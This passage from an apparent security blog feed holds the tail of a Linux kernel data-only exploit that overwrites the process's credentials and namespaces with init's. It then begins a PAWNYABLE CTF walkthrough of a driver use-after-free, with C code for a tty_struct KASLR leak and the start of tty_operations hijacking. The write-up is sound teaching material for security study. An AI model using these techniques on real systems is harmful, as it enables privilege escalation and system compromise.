    <span class="n">info</span><span class="p">(</span><span class="s">"Overwriting our cred with init's..."</span><span class="p">);</span>
    <span class="n">overwrite_cred</span><span class="p">();</span>

    <span class="c1">// Make sure it's correct</span>
    <span class="kt">uint64_t</span> <span class="n">check_cred</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_cred_where</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">check_cred</span> <span class="o">!=</span> <span class="n">g_cred_what</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"check_cred: 0x%lx != g_cred_what: 0x%lx"</span><span class="p">,</span>
            <span class="n">check_cred</span><span class="p">,</span> <span class="n">g_cred_what</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Overwrite our real_cred with init's cred</span>
    <span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Overwriting our real_cred with init's..."</span><span class="p">);</span>
    <span class="n">overwrite_real_cred</span><span class="p">();</span>

    <span class="c1">// Make sure it's correct</span>
    <span class="n">check_cred</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_real_cred_where</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">check_cred</span> <span class="o">!=</span> <span class="n">g_cred_what</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"check_cred: 0x%lx != g_cred_what: 0x%lx"</span><span class="p">,</span> <span class="n">check_cred</span><span class="p">,</span> <span class="n">g_cred_what</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Overwrite our nsproxy with init's</span>
    <span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"Overwriting our nsproxy with init's..."</span><span class="p">);</span>
    <span class="n">overwrite_nsproxy</span><span class="p">();</span>

    <span class="c1">// Make sure it's correct</span>
    <span class="n">check_cred</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_nsproxy_where</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">check_cred</span> <span class="o">!=</span> <span class="n">g_nsproxy_what</span><span class="p">)</span>
    <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"check_cred: 0x%lx != g_nsproxy_what: 0x%lx"</span><span class="p">,</span>
            <span class="n">check_cred</span><span class="p">,</span> <span class="n">g_nsproxy_what</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="n">info</span><span class="p">(</span><span class="s">"Creds and namespace look good!"</span><span class="p">);</span>
    
    <span class="c1">// Let the child loose</span>
    <span class="o">*</span><span class="p">(</span><span class="kt">int</span> <span class="o">*</span><span class="p">)</span><span class="n">g_shmem</span> <span class="o">=</span> <span class="mh">0x1337</span><span class="p">;</span>

    <span class="n">sleep</span><span class="p">(</span><span class="mi">3000</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>]]></content><author><name></name></author><category term="Linux kernel" /><category term="Pwn" /><category term="UAF" /><category term="Tutorial" /><category term="CTF" /><category term="Walkthrough" /><summary type="html"><![CDATA[Introduction I’ve been doing some Linux kernel exploit development/study and vulnerability research off and on since last Fall and a few months ago I had some downtime on vacation to sit and challenge myself to write my first data-only exploit for a real bug that was exploited in kCTF. io_uring has been a popular target in the program’s history up to this point, so I thought I’d find an easy-to-reason-about bug there that had already been exploited as fertile ground for exploit development creativity. The bug I chose to work with was one which resulted in a struct file UAF where it was possible to hold an open file descriptor to the freed object. There have been quite a few write-ups on file UAF exploits, so I decided as a challenge that my exploit had to be data-only. The parameters of the self-imposed challenge were completely arbitrary, but I just wanted to try writing an exploit that didn’t rely on hijacking control flow. I have written quite a few Linux kernel exploits of real kCTF bugs at this point, probably 5-6 as practice, just starting with the vulnerability and going from there, but all of them have ended up in me using ROP, so this was my first try at data-only. I also had not seen a data-only exploit for a struct file UAF yet, which was encouraging as it seemed it was worthwhile “research”. Also, before we get too far, please do not message me to tell me that someone already did xyz years prior. I’m very new to this type of thing and was just doing this as a personal challenge; if some aspects of the exploit are unoriginal, that is by coincidence. 
I will do my best to cite all my inspiration as we go.]]></summary></entry><entry><title type="html">PAWNYABLE UAF Walkthrough (Holstein v3)</title><link href="https://h0mbre.github.io/PAWNYABLE_UAF_Walkthrough/" rel="alternate" type="text/html" title="PAWNYABLE UAF Walkthrough (Holstein v3)" /><published>2022-10-29T00:00:00+00:00</published><updated>2022-10-29T00:00:00+00:00</updated><id>https://h0mbre.github.io/PAWNYABLE_UAF_Walkthrough</id><content type="html" xml:base="https://h0mbre.github.io/PAWNYABLE_UAF_Walkthrough/"><![CDATA[<h2 id="introduction">Introduction</h2>

<p>I’ve been wanting to learn Linux Kernel exploitation for some time and a couple months ago <a href="https://twitter.com/ptrYudai">@ptrYudai</a> from <a href="https://twitter.com/zer0pts">@zer0pts</a> tweeted that they released the beta version of their website <a href="https://pawnyable.cafe/">PAWNYABLE!</a>, which is a “resource for middle to advanced learners to study Binary Exploitation”. The first section on the website with material already ready is “Linux Kernel”, so this was a perfect place to start learning.</p>

<p>The author does a great job explaining everything you need to know to get started, things like: setting up a debugging environment, CTF-specific tips, modern kernel exploitation mitigations, using QEMU, manipulating images, per-CPU slab caches, etc, so this blogpost will focus exclusively on my experience with the challenge and the way I decided to solve it. I’m going to try and limit redundant information within this blogpost so if you have any questions, it’s best to consult PAWNYABLE and the other linked resources.</p>

<h2 id="what-i-started-with">What I Started With</h2>

<p>PAWNYABLE ended up being a great way for me to start learning about Linux Kernel exploitation, mainly because I didn’t have to spend any time getting up to speed on a kernel subsystem in order to start wading into the exploitation metagame. For instance, if you are the type of person who learns by doing, and your first attempt at learning about this stuff was to write your own exploit for CVE-2022-32250, you would first have to spend a considerable amount of time learning about Netfilter. Instead, PAWNYABLE gives you a straightforward example of a vulnerability in one of a handful of bug-classes, and then gets to work showing you how you could exploit it. I think this strategy is great for beginners like me. It’s worth noting that after having spent some time with PAWNYABLE, I have been able to write some exploits for real-world bugs similar to CVE-2022-32250, so my strategy did prove to be fruitful (at least for me).</p>

<p>I’ve been doing low-level binary stuff (mostly on Linux) for the past 3 years. Initially I was very interested in learning binary exploitation but started gravitating towards vulnerability discovery and fuzzing. Fuzzing has captivated me since early 2020, and developing my own fuzzing frameworks actually led to me working as a full-time software developer for the last couple of years. So after going pretty deep with fuzzing (objectively not that deep as it relates to the entire fuzzing space, but deep for the uninitiated), I wanted to circle back and learn at least some aspect of binary exploitation that applied to modern targets.</p>

<p>The Linux Kernel, as a target, seemed like a happy marriage between multiple things: it’s relatively easy to write exploits for due to a lack of mitigations, exploitable bugs and their resulting exploits have a wide and high impact, and there are active bounty systems/programs for Linux Kernel exploits. As a quick side-note, there have been some tremendous strides made in the world of Linux Kernel fuzzing in the last few years so I knew that specializing in this space would allow me to get up to speed on those approaches/tools.</p>

<p>So coming into this, I had a pretty good foundation of basic binary exploitation (mostly dated Windows and Linux userland stuff), a few years of C development (to include a few Linux Kernel modules), and some reverse engineering skills.</p>

<h2 id="what-i-did">What I Did</h2>

<p>To get started, I read through the following PAWNYABLE sections (section names have been Google translated to English):</p>

<ul>
  <li>Introduction to kernel exploits</li>
  <li>kernel debugging with gdb</li>
  <li>security mechanism (Overview of Exploitation Mitigations)</li>
  <li>Compile and transfer exploits (working with the kernel image)</li>
</ul>

<p>This was great as a starting point because everything is so well organized you don’t have to spend time setting up your environment; it’s basically just copy-pasting a few commands and you’re off and remotely debugging a kernel via GDB (with GEF even).</p>

<p>Next, I started working on the first challenge, which is a stack-based buffer overflow vulnerability in Holstein v1. This is a great starting place because right away you get control of the instruction pointer and from there, you’re learning about things like the way CTF players (and security researchers) often leverage kernel code execution to escalate privileges by calling functions like <code class="language-plaintext highlighter-rouge">prepare_kernel_cred</code> and <code class="language-plaintext highlighter-rouge">commit_creds</code>.</p>

<p>You can write an exploit that bypasses mitigations or not, it’s up to you. I started slowly and wrote an exploit with no mitigations enabled, then slowly turned the mitigations up and changed the exploit as needed.</p>

<p>After that, I started working on a popular Linux kernel pwn challenge called “kernel-rop” from hxpCTF 2020. I followed along and worked alongside the following blogposts from <a href="https://twitter.com/_lkmidas">@_lkmidas</a>:</p>

<ul>
  <li><a href="https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/">Learning Kernel Exploitation - Part 1</a></li>
  <li><a href="https://lkmidas.github.io/posts/20210128-linux-kernel-pwn-part-2/">Learning Kernel Exploitation - Part 2</a></li>
  <li><a href="https://lkmidas.github.io/posts/20210205-linux-kernel-pwn-part-3/">Learning Kernel Exploitation - Part 3</a></li>
</ul>

<p>This was great because it gave me a chance to reinforce everything I had learned from the PAWNYABLE stack buffer overflow challenge, and I also learned a few new things. I also used <a href="https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/">this write-up from 0x434b.dev</a> to supplement some of the information.</p>

<p>As a bonus, I also wrote a version of the exploit that utilized a different technique to elevate privileges: <a href="https://lkmidas.github.io/posts/20210223-linux-kernel-pwn-modprobe/">overwriting <code class="language-plaintext highlighter-rouge">modprobe_path</code></a>.</p>

<p>After all this, I felt like I had a good enough base to get started on the UAF challenge.</p>

<h2 id="uaf-challenge-holstein-v3">UAF Challenge: Holstein v3</h2>

<p>A quick look at the vulnerable driver provided by the author makes the problem clear.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">char</span> <span class="o">*</span><span class="n">g_buf</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">module_open</span><span class="p">(</span><span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span><span class="p">,</span> <span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">)</span>
<span class="p">{</span>
  <span class="n">printk</span><span class="p">(</span><span class="n">KERN_INFO</span> <span class="s">"module_open called</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

  <span class="n">g_buf</span> <span class="o">=</span> <span class="n">kzalloc</span><span class="p">(</span><span class="n">BUFFER_SIZE</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
  <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">g_buf</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printk</span><span class="p">(</span><span class="n">KERN_INFO</span> <span class="s">"kmalloc failed"</span><span class="p">);</span>
    <span class="k">return</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>When we open the kernel driver, <code class="language-plaintext highlighter-rouge">char *g_buf</code> gets assigned the result of a call to <code class="language-plaintext highlighter-rouge">kzalloc()</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">module_close</span><span class="p">(</span><span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span><span class="p">,</span> <span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">)</span>
<span class="p">{</span>
  <span class="n">printk</span><span class="p">(</span><span class="n">KERN_INFO</span> <span class="s">"module_close called</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
  <span class="n">kfree</span><span class="p">(</span><span class="n">g_buf</span><span class="p">);</span>
  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>When we close the kernel driver, <code class="language-plaintext highlighter-rouge">g_buf</code> is freed. As the author explains, this is a buggy code pattern since we can open multiple handles to the driver from within our program. Something like this can occur.</p>

<ol>
  <li>We’ve done nothing, <code class="language-plaintext highlighter-rouge">g_buf = NULL</code></li>
  <li>We’ve opened the driver, <code class="language-plaintext highlighter-rouge">g_buf = 0xffff...a0</code>, and we have <code class="language-plaintext highlighter-rouge">fd1</code> in our program</li>
  <li>We’ve opened the driver a second time, <code class="language-plaintext highlighter-rouge">g_buf = 0xffff...b0</code>. The original value of <code class="language-plaintext highlighter-rouge">0xffff...a0</code> has been overwritten, so that first allocation can no longer be freed and is leaked (not super important). We now have <code class="language-plaintext highlighter-rouge">fd2</code> in our program</li>
  <li>We close <code class="language-plaintext highlighter-rouge">fd1</code> which calls <code class="language-plaintext highlighter-rouge">kfree()</code> on <code class="language-plaintext highlighter-rouge">0xffff...b0</code> and frees the same pointer we have a reference to with <code class="language-plaintext highlighter-rouge">fd2</code>.</li>
</ol>
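
<p>The sequence above can be sketched from userland roughly as follows. This is a minimal illustration rather than the exploit’s actual code: the helper name <code class="language-plaintext highlighter-rouge">make_dangling_fd</code> is hypothetical, and the device path is left as a parameter because the node name the challenge VM exposes is an assumption here.</p>

```c
#include <fcntl.h>
#include <unistd.h>

// Hypothetical helper: open the driver twice, then close the first
// descriptor. On the vulnerable module, that close frees the buffer the
// surviving descriptor still reads from and writes to.
// Returns the surviving descriptor, or -1 if either open() fails.
int make_dangling_fd(const char *dev_path)
{
    // Step 2: first open, module_open() allocates g_buf
    int fd1 = open(dev_path, O_RDWR);
    if (fd1 < 0) {
        return -1;
    }

    // Step 3: second open, g_buf is overwritten with a new allocation
    int fd2 = open(dev_path, O_RDWR);
    if (fd2 < 0) {
        close(fd1);
        return -1;
    }

    // Step 4: module_close() frees the current g_buf, fd2 stays usable
    close(fd1);
    return fd2;
}
```

<p>The returned descriptor is the one you would keep around for the later reads and writes against the freed object.</p>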

<p>At this point, via our access to <code class="language-plaintext highlighter-rouge">fd2</code>, we have a use after free since we can still potentially use a freed reference to <code class="language-plaintext highlighter-rouge">g_buf</code>. The module also allows us to use the open file descriptor with read and write methods.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">ssize_t</span> <span class="nf">module_read</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span>
                           <span class="kt">char</span> <span class="n">__user</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">count</span><span class="p">,</span>
                           <span class="n">loff_t</span> <span class="o">*</span><span class="n">f_pos</span><span class="p">)</span>
<span class="p">{</span>
  <span class="n">printk</span><span class="p">(</span><span class="n">KERN_INFO</span> <span class="s">"module_read called</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

  <span class="k">if</span> <span class="p">(</span><span class="n">count</span> <span class="o">&gt;</span> <span class="n">BUFFER_SIZE</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printk</span><span class="p">(</span><span class="n">KERN_INFO</span> <span class="s">"invalid buffer size</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="k">if</span> <span class="p">(</span><span class="n">copy_to_user</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="n">g_buf</span><span class="p">,</span> <span class="n">count</span><span class="p">))</span> <span class="p">{</span>
    <span class="n">printk</span><span class="p">(</span><span class="n">KERN_INFO</span> <span class="s">"copy_to_user failed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="k">return</span> <span class="n">count</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">ssize_t</span> <span class="nf">module_write</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span>
                            <span class="k">const</span> <span class="kt">char</span> <span class="n">__user</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">count</span><span class="p">,</span>
                            <span class="n">loff_t</span> <span class="o">*</span><span class="n">f_pos</span><span class="p">)</span>
<span class="p">{</span>
  <span class="n">printk</span><span class="p">(</span><span class="n">KERN_INFO</span> <span class="s">"module_write called</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

  <span class="k">if</span> <span class="p">(</span><span class="n">count</span> <span class="o">&gt;</span> <span class="n">BUFFER_SIZE</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printk</span><span class="p">(</span><span class="n">KERN_INFO</span> <span class="s">"invalid buffer size</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="k">if</span> <span class="p">(</span><span class="n">copy_from_user</span><span class="p">(</span><span class="n">g_buf</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">count</span><span class="p">))</span> <span class="p">{</span>
    <span class="n">printk</span><span class="p">(</span><span class="n">KERN_INFO</span> <span class="s">"copy_from_user failed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="k">return</span> <span class="n">count</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So with these methods, we are able to read and write to our freed object. This is great for us since we’re free to pretty much do anything we want. We are limited somewhat by the object size which is hardcoded in the code to <code class="language-plaintext highlighter-rouge">0x400</code>.</p>

<p>At a high-level, UAFs are generally exploited by creating the UAF condition, so we have a reference to a freed object within our control, and then we want to cause the allocation of a <em>different</em> object to fill the space that was previously filled by our freed object.</p>

<p>So if we allocated a <code class="language-plaintext highlighter-rouge">g_buf</code> of size <code class="language-plaintext highlighter-rouge">0x400</code> and then freed it, we need to place another object in its place. This new object would then be the target of our reads and writes.</p>

<h2 id="kaslr-bypass">KASLR Bypass</h2>

<p>The first thing we need to do is bypass KASLR by leaking some address that is a known static offset from the kernel image base. I started searching for objects that have leakable members and again, @ptrYudai came to the rescue with a catalog on <a href="https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628">useful Linux Kernel data structures</a> for exploitation. This led me to the <a href="https://elixir.bootlin.com/linux/latest/source/include/linux/tty.h#L195"><code class="language-plaintext highlighter-rouge">tty_struct</code></a> which is allocated on the same slab cache as our <code class="language-plaintext highlighter-rouge">0x400</code> buffer, the <code class="language-plaintext highlighter-rouge">kmalloc-1024</code>. The <code class="language-plaintext highlighter-rouge">tty_struct</code> has a field called <code class="language-plaintext highlighter-rouge">ops</code>, which is a pointer to a <code class="language-plaintext highlighter-rouge">tty_operations</code> function table that sits at a static offset from the kernel base. So if we can leak the value of <code class="language-plaintext highlighter-rouge">ops</code>, we will have bypassed KASLR. This struct was used by <a href="https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/">NCCGROUP for the same purpose in their exploit of CVE-2022-32250</a>.</p>
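
<p>The arithmetic behind the bypass is just a subtraction, sketched below. The function names and the <code class="language-plaintext highlighter-rouge">EXAMPLE_OPS_OFF</code> value are hypothetical placeholders; the real offset has to be read from the symbols of the specific kernel build. The sanity check assumes an x86-64 kernel, where the image base lives in the upper canonical range and is at least 2 MiB aligned.</p>

```c
#include <stdint.h>

// Hypothetical offset of the leaked function table from the kernel base.
// The real value must come from the target kernel's symbols.
#define EXAMPLE_OPS_OFF 0xc38880ULL

// The leaked pointer sits at a fixed distance from the kernel base, so
// subtracting that distance recovers the randomized base.
uint64_t kernel_base_from_leak(uint64_t leaked_ops, uint64_t ops_off)
{
    return leaked_ops - ops_off;
}

// Cheap sanity check (x86-64 assumption): top 16 bits set and the base
// aligned to 2 MiB. Returns 1 if the value is plausible, 0 otherwise.
int looks_like_kernel_base(uint64_t base)
{
    return ((base >> 48) == 0xFFFF) && ((base & 0x1FFFFFULL) == 0);
}
```

<p>A check like this is worth running before using the base for anything else, since a failed heap reclaim would leave unrelated data where the pointer was expected.</p>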

<p>It’s important to note that the slab cache we’re targeting is per-CPU. Luckily, the VM we’re given for the challenge only has one logical core so we don’t have to worry about CPU affinity for this exercise. On most systems with more than one core, we would have to worry about influencing one specific CPU’s cache.</p>
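
<p>This exploit does not need it, but on a multi-core target a common approach is to pin the exploit process to a single CPU before doing any allocations or frees, so that everything lands in the same per-CPU cache. A minimal sketch using <code class="language-plaintext highlighter-rouge">sched_setaffinity()</code> is below; the helper name <code class="language-plaintext highlighter-rouge">pin_to_cpu</code> is hypothetical and is not part of the exploit shown in this post.</p>

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE   // needed for cpu_set_t and the CPU_* macros
#endif
#include <sched.h>

// Hypothetical helper: restrict the calling thread to a single CPU so
// later allocations and frees go through that CPU's slab cache.
// Returns 0 on success, -1 on failure (errno is set by the syscall).
int pin_to_cpu(int cpu)
{
    cpu_set_t set;

    CPU_ZERO(&set);
    CPU_SET(cpu, &set);

    // A pid of 0 means "the calling thread"
    return sched_setaffinity(0, sizeof(set), &set);
}
```

<p>You would call this once at the start of the exploit, before creating the UAF condition.</p>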

<p>So with our <code class="language-plaintext highlighter-rouge">module_read</code> ability, we will simply:</p>

<ol>
  <li>Free <code class="language-plaintext highlighter-rouge">g_buf</code></li>
  <li>Create <code class="language-plaintext highlighter-rouge">dev_tty</code> structs until one hopefully fills the freed space where <code class="language-plaintext highlighter-rouge">g_buf</code> used to live</li>
  <li>Call <code class="language-plaintext highlighter-rouge">module_read</code> to get a copy of the <code class="language-plaintext highlighter-rouge">g_buf</code> which is now actually our <code class="language-plaintext highlighter-rouge">dev_tty</code> and then inspect the value of <code class="language-plaintext highlighter-rouge">tty_struct-&gt;ops</code>.</li>
</ol>

<p>Here are some snippets of code related to that from the exploit:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Leak a tty_struct-&gt;ops field which is constant offset from kernel base</span>
<span class="kt">uint64_t</span> <span class="nf">leak_ops</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Bad fd given to `leak_ops()`"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="cm">/* tty_struct {
        int magic;      // 4 bytes
        struct kref;    // 4 bytes (single member is an int refcount_t)
        struct device *dev; // 8 bytes
        struct tty_driver *driver; // 8 bytes
        const struct tty_operations *ops; (offset 24 (or 0x18))
        ...
    } */</span>

    <span class="c1">// Read first 32 bytes of the structure</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="o">*</span><span class="n">ops_buf</span> <span class="o">=</span> <span class="n">calloc</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">32</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">ops_buf</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to allocate ops_buf"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="kt">ssize_t</span> <span class="n">bytes_read</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">ops_buf</span><span class="p">,</span> <span class="mi">32</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">bytes_read</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">ssize_t</span><span class="p">)</span><span class="mi">32</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to read enough bytes from fd: %d"</span><span class="p">,</span> <span class="n">fd</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="kt">uint64_t</span> <span class="n">ops</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">ops_buf</span><span class="p">[</span><span class="mi">24</span><span class="p">];</span>
    <span class="n">free</span><span class="p">(</span><span class="n">ops_buf</span><span class="p">);</span> <span class="c1">// Done with the temporary copy</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"tty_struct-&gt;ops: 0x%lx"</span><span class="p">,</span> <span class="n">ops</span><span class="p">);</span>

    <span class="c1">// Solve for kernel base, keep the last 12 bits</span>
    <span class="kt">uint64_t</span> <span class="n">test</span> <span class="o">=</span> <span class="n">ops</span> <span class="o">&amp;</span> <span class="mh">0xfffULL</span><span class="p">;</span>

    <span class="c1">// These magic compares are for static offsets on this kernel</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">test</span> <span class="o">==</span> <span class="mh">0xb40ULL</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">ops</span> <span class="o">-</span> <span class="mh">0xc39b40ULL</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">test</span> <span class="o">==</span> <span class="mh">0xc60ULL</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">ops</span> <span class="o">-</span> <span class="mh">0xc39c60ULL</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">else</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Got an unexpected tty_struct-&gt;ops ptr"</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The confusing part here is the <code class="language-plaintext highlighter-rouge">AND</code> that keeps only the lower 12 bits of the leaked value. I did that because I kept getting one of two values across multiple runs of the exploit within the same boot. This is probably because there are two kinds of <code class="language-plaintext highlighter-rouge">tty_structs</code> that can be allocated, they are allocated in pairs, and each kind points at a different <code class="language-plaintext highlighter-rouge">ops</code> table. Since KASLR doesn’t change the low 12 bits of an address, those bits tell us which table we leaked. The <code class="language-plaintext highlighter-rouge">if</code> <code class="language-plaintext highlighter-rouge">else if</code> block just handles both cases and solves the kernel base for us. So at this point we have bypassed KASLR because we know the base address the kernel is loaded at.</p>
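<p>The same lookup can be written as a small table, which makes it easier to add more candidates later. This is just a sketch. The two offsets are the ones from the magic compares in <code class="language-plaintext highlighter-rouge">leak_ops()</code> and are only valid for this challenge’s kernel build, and the names <code class="language-plaintext highlighter-rouge">known_ops_offsets</code> and <code class="language-plaintext highlighter-rouge">kernel_base_from_ops</code> are mine, not from the exploit:</p>

```c
#include <stddef.h>
#include <stdint.h>

// Offsets of the two possible ops tables from the kernel base.
// Taken from the compares in leak_ops(); specific to this kernel build.
static const uint64_t known_ops_offsets[] = { 0xc39b40ULL, 0xc39c60ULL };

// Hypothetical helper: return the kernel base for a leaked ops pointer,
// or 0 if the pointer does not match any known table.
uint64_t kernel_base_from_ops(uint64_t ops) {
    size_t n = sizeof(known_ops_offsets) / sizeof(known_ops_offsets[0]);

    for (size_t i = 0; i < n; i++) {
        uint64_t off = known_ops_offsets[i];

        // The low 12 bits are untouched by KASLR, so they identify the table
        if ((ops & 0xfffULL) != (off & 0xfffULL)) {
            continue;
        }

        // Guard against underflow on a bogus leak
        if (ops < off) {
            continue;
        }

        return ops - off;
    }

    return 0;
}
```

<p>A return value of <code class="language-plaintext highlighter-rouge">0</code> means the leak didn’t look like either table, which is a good sign that something other than a <code class="language-plaintext highlighter-rouge">tty_struct</code> reclaimed the freed chunk.</p>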

<h2 id="rip-control">RIP Control</h2>

<p>Next, we need some way to hijack execution. Luckily, we can use the same data structure, <code class="language-plaintext highlighter-rouge">tty_struct</code>, since we can write to the object using <code class="language-plaintext highlighter-rouge">module_write</code> and overwrite the pointer value for <code class="language-plaintext highlighter-rouge">tty_struct-&gt;ops</code>.</p>

<p><a href="https://elixir.bootlin.com/linux/latest/source/include/linux/tty_driver.h#L349"><code class="language-plaintext highlighter-rouge">struct tty_operations</code></a> is a table of function pointers, and looks like this:</p>

<pre><code class="language-C">struct tty_operations {
	struct tty_struct * (*lookup)(struct tty_driver *driver,
			struct file *filp, int idx);
	int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
	void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
	int  (*open)(struct tty_struct * tty, struct file * filp);
	void (*close)(struct tty_struct * tty, struct file * filp);
	void (*shutdown)(struct tty_struct *tty);
	void (*cleanup)(struct tty_struct *tty);
	int  (*write)(struct tty_struct * tty,
		      const unsigned char *buf, int count);
	int  (*put_char)(struct tty_struct *tty, unsigned char ch);
	void (*flush_chars)(struct tty_struct *tty);
	unsigned int (*write_room)(struct tty_struct *tty);
	unsigned int (*chars_in_buffer)(struct tty_struct *tty);
	int  (*ioctl)(struct tty_struct *tty,
		    unsigned int cmd, unsigned long arg);
	...SNIP...
};
</code></pre>

<p>These handlers are invoked when certain actions are performed on an instance of a <code class="language-plaintext highlighter-rouge">tty_struct</code>. For example, when the <code class="language-plaintext highlighter-rouge">tty_struct</code>’s controlling process exits, several of these functions are called in a row: <code class="language-plaintext highlighter-rouge">close()</code>, <code class="language-plaintext highlighter-rouge">shutdown()</code>, and <code class="language-plaintext highlighter-rouge">cleanup()</code>.</p>
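<p>Since we are going to forge this table by hand later, it helps to know which slot each handler lives in. Here is a small sketch that mirrors the first 13 members from the listing above in userland and lets the compiler work out the slot numbers. The struct name <code class="language-plaintext highlighter-rouge">fake_tty_ops</code> and the <code class="language-plaintext highlighter-rouge">OPS_SLOT</code> macro are made up for illustration, and the layout assumes the member order shown above for this kernel version:</p>

```c
#include <stddef.h>

// Hypothetical userland mirror of the first 13 slots of
// struct tty_operations, in the order shown in the listing above.
// Every member is a function pointer in the kernel, so one void * per
// slot reproduces the layout.
struct fake_tty_ops {
    void *lookup;
    void *install;
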